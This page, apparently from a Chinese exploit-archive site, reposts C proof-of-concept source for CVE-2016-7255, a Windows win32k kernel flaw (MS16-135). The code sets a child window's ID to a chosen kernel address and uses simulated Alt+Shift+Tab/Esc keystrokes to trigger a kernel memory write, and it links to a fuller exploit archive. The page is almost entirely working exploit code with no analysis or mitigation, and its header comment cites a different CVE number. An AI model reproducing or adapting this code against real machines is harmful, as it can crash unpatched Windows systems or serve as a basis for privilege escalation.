首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
来源:root[at]TinySec.net 作者:TinySec 发布时间:2016-11-10  
/*
Source: https://github.com/tinysec/public/tree/master/CVE-2016-7255
 
Full Proof of Concept:
 
https://github.com/tinysec/public/tree/master/CVE-2016-7255
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40745.zip
 
********************************************************************
 Created:   2016-11-09 14:23:09
 Filename:  main.c
 Author:    root[at]TinySec.net
 Version    0.0.0.1
 Purpose:   poc of cve-2016-0075
*********************************************************************
*/
 
#include <windows.h>
#include <wchar.h>
#include <stdlib.h>
#include <stdio.h>
 
 
//////////////////////////////////////////////////////////////////////////
#pragma comment(lib,"ntdll.lib")
#pragma comment(lib,"user32.lib")
 
#undef DbgPrint
ULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );
ULONG __cdecl DbgPrint(__in char* Format, ...)
{
    CHAR* pszDbgBuff = NULL;
    va_list VaList=NULL;
    ULONG ulRet = 0;
    
    do
    {
        pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));
        if (NULL == pszDbgBuff)
        {
            break;
        }
        RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));
        
        va_start(VaList,Format);
        
        _vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);
        
        DbgPrintEx(77 , 0 , pszDbgBuff );
        OutputDebugStringA(pszDbgBuff);
        
        va_end(VaList);
        
    } while (FALSE);
    
    if (NULL != pszDbgBuff)
    {
        HeapFree( GetProcessHeap(), 0 , pszDbgBuff );
        pszDbgBuff = NULL;
    }
    
    return ulRet;
}
 
 
 int _sim_key_down(WORD wKey)
 {
     INPUT stInput = {0};
     
     do
     {
         stInput.type = INPUT_KEYBOARD;
         stInput.ki.wVk = wKey;
         stInput.ki.dwFlags = 0;
         
         SendInput(1 , &stInput , sizeof(stInput) );
 
     } while (FALSE);
     
     return 0;
}
 
 int _sim_key_up(WORD wKey)
 {
     INPUT stInput = {0};
     
     do
     {
         stInput.type = INPUT_KEYBOARD;
         stInput.ki.wVk = wKey;
         stInput.ki.dwFlags = KEYEVENTF_KEYUP;
         
         SendInput(1 , &stInput , sizeof(stInput) );
         
     } while (FALSE);
     
     return 0;
}
 
 int _sim_alt_shift_esc()
 {
     int i = 0;
     
     do
     {
         _sim_key_down( VK_MENU );
         _sim_key_down( VK_SHIFT ); 
         
        
        _sim_key_down( VK_ESCAPE);
        _sim_key_up( VK_ESCAPE);
 
        _sim_key_down( VK_ESCAPE);
        _sim_key_up( VK_ESCAPE);
             
         _sim_key_up( VK_MENU );
         _sim_key_up( VK_SHIFT );       
         
         
     } while (FALSE);
     
     return 0;
}
 
 
 
 int _sim_alt_shift_tab(int nCount)
 {
     int i = 0;
     HWND hWnd = NULL;
 
 
     int nFinalRet = -1;
 
     do
     {
         _sim_key_down( VK_MENU );
         _sim_key_down( VK_SHIFT ); 
 
 
         for ( i = 0; i < nCount ; i++)
         {
             _sim_key_down( VK_TAB);
             _sim_key_up( VK_TAB);
             
             Sleep(1000);
 
         }
    
         
        _sim_key_up( VK_MENU );
         _sim_key_up( VK_SHIFT );   
     } while (FALSE);
     
     return nFinalRet;
}
 
 
 
int or_address_value_4(__in void* pAddress)
{
    WNDCLASSEXW stWC = {0};
 
    HWND    hWndParent = NULL;
    HWND    hWndChild = NULL;
 
    WCHAR*  pszClassName = L"cve-2016-7255";
    WCHAR*  pszTitleName = L"cve-2016-7255";
 
    void*   pId = NULL;
    MSG     stMsg = {0};
 
    do
    {
 
        stWC.cbSize = sizeof(stWC);
        stWC.lpfnWndProc = DefWindowProcW;
        stWC.lpszClassName = pszClassName;
        
        if ( 0 == RegisterClassExW(&stWC) )
        {
            break;
        }
 
        hWndParent = CreateWindowExW(
            0,
            pszClassName,
            NULL,
            WS_OVERLAPPEDWINDOW|WS_VISIBLE,
            0,
            0,
            360,
            360,
            NULL,
            NULL,
            GetModuleHandleW(NULL),
            NULL
        );
 
        if (NULL == hWndParent)
        {
            break;
        }
 
        hWndChild = CreateWindowExW(
            0,
            pszClassName,
            pszTitleName,
            WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,
            0,
            0,
            160,
            160,
            hWndParent,
            NULL,
            GetModuleHandleW(NULL),
            NULL
        );
        
        if (NULL == hWndChild)
        {
            break;
        }
 
        #ifdef _WIN64
            pId = ( (UCHAR*)pAddress - 0x28 );
        #else
            pId = ( (UCHAR*)pAddress - 0x14);
        #endif // #ifdef _WIN64
        
        SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );
 
        DbgPrint("hWndChild = 0x%p\n" , hWndChild);
        DebugBreak();
 
        ShowWindow(hWndParent , SW_SHOWNORMAL);
 
        SetParent(hWndChild , GetDesktopWindow() );
 
        SetForegroundWindow(hWndChild);
 
        _sim_alt_shift_tab(4);
        
        SwitchToThisWindow(hWndChild , TRUE);
        
        _sim_alt_shift_esc();
 
 
        while( GetMessage(&stMsg , NULL , 0 , 0) )
        {  
            TranslateMessage(&stMsg);
            DispatchMessage(&stMsg);
        }
    
 
    } while (FALSE);
 
    if ( NULL != hWndParent )
    {
        DestroyWindow(hWndParent);
        hWndParent = NULL;
    }
 
    if ( NULL != hWndChild )
    {
        DestroyWindow(hWndChild);
        hWndChild = NULL;
    }
 
    UnregisterClassW(pszClassName , GetModuleHandleW(NULL) );
 
    return 0;
}
 
int __cdecl wmain(int nArgc, WCHAR** Argv)
{
    do
    {
        or_address_value_4( (void*)0xFFFFFFFF );
    } while (FALSE);
    
    return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·VBScript 5.8.7600.16385 / 5.8.
·e107 CMS 2.1.2 - Privilege Esc
·Avira Antivirus 15.0.21.86 - '
·Microsoft WININET.dll - CHttpH
·Eir D1000 Wireless Router - WA
·Microsoft Internet Explorer 9-
·Linux Kernel - TCP Related Rea
·PCMan FTP Server 2.0.7 HELP Bu
·Solaris 8/9 passwd(1) - 'circ(
·PCMan FTP Server 2.0.7 LIST Bu
·Solaris 7/8/9 CDE libDtHelp -
·Office OLE DLL Hijacking
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved